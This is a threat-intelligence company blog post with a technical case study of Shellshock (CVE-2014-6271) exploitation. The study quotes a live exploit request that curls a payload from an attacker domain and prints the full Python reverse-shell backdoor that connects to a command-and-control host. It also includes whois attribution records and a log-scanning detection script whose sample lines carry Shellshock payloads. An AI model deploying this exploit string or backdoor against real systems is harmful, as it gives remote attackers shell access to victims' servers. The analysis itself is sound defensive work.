At least three times every week I get asked by someone "What's the difference between Wapack Labs and Red Sky Alliance?" "Who is your target customer?" "What product do we deliver?" "What's your distribution look like?"
So let's start here...
Wapack Labs is an intelligence, research and analysis company. We sell information.
- Wapack Labs authors, sources and sells intelligence, research and analysis. We deliver it in many forms, to many places... Red Sky Alliance/Beadwindow, the FS-ISAC, Subscriptions, OEM, Threat Recon, etc. We publish in PDF, STIX, HTML, CSV, and JSON.
- Security researchers go to Red Sky Alliance to share notes, build the story, and together, protect their networks. What happens in Red Sky Alliance, stays in Red Sky Alliance. It's private. There's no government involvement. We don't care how you interact with DSS, the regulators, or any other government organization --that's your choice. Red Sky Alliance exists to help improve your security. The private portal is ALWAYS busy. We've added university users, and just this week, another Icelandic bank.
- For government security researchers we offer a second collaborative... Beadwindow --delivered in Threat Connect. They do not get access to the Red Sky private portal, but they do get information that they may care about. We've delivered cyber warnings, dumped credential caches and targeting, to several government agencies directly, and for others, we push stuff through Beadwindow to contacts at the 24th AF and the US MDA. None of the US Cyber Centers participate, so if you're a state, local or .gov who needs help, call us. We can help. And our stuff is UNCLASSIFIED! You can actually use it!
We published this report in its entirety last week.
We took a bit of a different approach on what seemed to be the hottest topic of the last two weeks - Shellshock. (Need information on Shellshock? Try here.)
We're looking for use cases that we might help protect against. This is one of three case studies that we'd identified taking advantage of Shellshock.
You'll see quickly that it's written for technically focused defenders. If you're a SOC analyst, incident responder, or intrusion analyst, this is for you. We have others for managers and the C-Suite, but this report is lower level. We show all of our work and sources. When done, it gets published as a PDF in whole, and (if sourced by Wapack Labs) farmed for Threat Recon.
So if you're a techie, enjoy. If you're a manager, ask your techie what it means ;)
SHELLSHOCK CASE STUDY AND INFRASTRUCTURE
Beginning on 24 September 2014, hackers and researchers began exploiting the widely publicized Shellshock bash vulnerability, described in CVE-2014-6271. The majority of the initial activity involved mass vulnerability scanning by white hats and black hats alike. Examination of scanning activity showed a peak on September 27th with a sharp decline as of September 29th. This spike and sudden decrease may be a result of what is likely wide-scale patching of the vulnerability. Alternatively, this may mark the end of exploiting the vulnerability for reconnaissance purposes and could signal a move up the kill-chain into more targeted operations.
Legacy Scamming infrastructure re-emerges with Shellshock
A recently observed instance of Shellshock in the wild took the form of a Python implemented backdoor hosted on google-traffic-analytics.com. Table 5 lists the observed originating IPs along with the Shellshock request:
Originating IPs | Shellshock Request
```
() { :;}; /bin/bash -c '/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tm
```
```python
#!/usr/bin/env python
from socket import *
import os
from time import sleep
import sys
fpid = os.fork()
if fpid!=0:
host='stats.google-traffic-analytics.com'
port=9091
sockobj = None
############################################
sockobj = None
recv = False
def connect():
    try:
        sockobj=socket(AF_INET,SOCK_STREAM)
        sockobj.connect((host,port))
        return sockobj
    except:
        return False
while True:
    while not sockobj:
        sockobj = connect()
        print "[*] Trying to reconnect..."
        sleep(1)
    if sockobj:
        recv = sockobj.recv(1024)
        #print recv
        if not recv: sockobj = False; break;
        cmd = recv.strip()
        res = os.popen(cmd).read()
        if res:
            sockobj.sendall(res)
```
Legacy Whois Record:
Registrant Contact:
Goga Gastoyan
Goga Gastoyan Goga Gastoyan bash@blogbuddy.ru
+7.4957452002 fax: +7.4957452002
Pokryshkina d.36 kv.36
Moscow Moscow 119602
ru

Current Record:
Admin Name: Radovanka Janekovic
Admin Organization: Goga Gastoyan
Admin Street: Ljubljanska 6
Admin City: Bled
Admin State/Province: Bled
Admin Postal Code: 4260
Admin Country: SI
Admin Phone: +386.15765749
Admin Phone Ext:
Admin Fax: +386.15765749
Admin Fax Ext:
Admin Email: support@google-traffic-analytics.com
Table 5. google-traffic-analytics.com Scanning Nodes
Upon successful exploitation, a curl request is made for http://google-traffic-analytics.com/cl.py. The Python script (cl.py) is a simple yet effective backdoor that works on both Linux and Windows. It also has zero detections on VirusTotal [1]. The configured C2 address is hosted on the subdomain stats.google-traffic-analytics.com. The downloaded Python script attempts to connect to the C2 on port 9091 and, if the C2 is listening, a shell is opened up to the victim.
During testing, the C2 node issued a uname -a command, which prints all available information about a Linux system [2]. [Comment: No additional activity was observed.] (See Mitigations section for a SNORT signature)
The re-emergence of this domain after an apparent four-year hiatus begs the question of whether it belongs to the same attackers. A Whois history report from Domain Tools lists the registrant during 2010 as “Goga Gastoyan” (bash@blogbuddy.ru); however, this changed in 2013 to the current owner, “Radovanka Janekovic”. Further inspection of the records revealed Goga Gastoyan as the Admin organization in the new record, thus confirming likely attribution to the same attackers. With the connection made to the legacy infrastructure, one could assume that this latest activity involving Shellshock could be the most recent attempt to expand the spamming network.
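For defenders hunting this activity in web server logs, the following is an added example (not part of the original report, and not the SNORT signature it refers to). It scans combined-format access log lines for the Shellshock function-definition prefix in the request, referer and user-agent fields and extracts any download host to pivot on. The function names, the log format and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit

# Apache/nginx "combined" format; quoted fields may contain backslash-escaped quotes.
Q = r'"((?:[^"\\]|\\.)*)"'
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] ' + Q + r' (\d{3}) \S+ ' + Q + ' ' + Q)
# bash treated an environment value beginning with "() {" as a function definition.
# Require start-of-field or a delimiter before it so text like "function(){}" is ignored.
TRIGGER_RE = re.compile(r'(?:^|[\s?=&])\(\)\s*\{')
URL_RE = re.compile(r'https?://[^\s\'"\\;>|]+')

def scan(lines):
    """Return one record per log field that carries a Shellshock-style payload."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, ts, request, status, referer, agent = m.groups()
        for name, value in (("request", request), ("referer", referer), ("user-agent", agent)):
            if TRIGGER_RE.search(value):
                urls = URL_RE.findall(value)
                hosts = sorted({urlsplit(u).hostname for u in urls})
                hits.append({"src": ip, "time": ts, "field": name, "status": status,
                             "urls": urls, "hosts": hosts})
    return hits

def staging_hosts(hits):
    """Hosts that payloads tried to download from: search proxy/DNS logs for these."""
    return sorted({h for hit in hits for h in hit["hosts"]})

# Constructed sample lines (documentation-range IPs); the payload in line 2 is a
# shortened form of the request shown in Table 5.
SAMPLE = [
    '192.0.2.10 - - [27/Sep/2014:10:01:02 +0000] "GET /search?q=function(){} HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [27/Sep/2014:10:01:05 +0000] "GET /cgi-bin/status HTTP/1.1" 200 0 "-" '
    '"() { :;}; /bin/bash -c \'/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update\'"',
    '203.0.113.5 - - [27/Sep/2014:10:02:11 +0000] "GET / HTTP/1.1" 404 0 "() { :; }; echo probe" "-"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit["src"], hit["field"], hit["hosts"] or "no download URL")
    print("pivot on:", staging_hosts(scan(SAMPLE)))
```

A hit whose payload names a download host is the one to follow up first: check the targeted server for outbound connections to that host and its subdomains.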
Table 6. Whois Record Comparison
[1] https://www.virustotal.com/en/file/052421011162421c7fbe1c9613e37b520a494034901dab1c6ee192466090421d/analysis/
[2] http://linux.about.com/library/cmd/blcmdl1_uname.htm
[3] http://blog.sucuri.net/2010/08/more-spam-google-traffic-analytics-com-cc-server.html
------------------------------------------------------
I realize this is pretty technical, but I thought it important to offer a simple slice of some of the work we do. This report is the basis for nearly everything else. These reports, when complete, are farmed for placement in Threat Recon. This information, sourced by the lab, is thought to be high confidence (although we never score anything perfect!).
This week is again, crazy. I'm on the podium at 9:00 at the FS-ISAC conference, and we've got a heck of a topic. I'm looking forward to seeing you all there.
Have a great weekend!
Jeff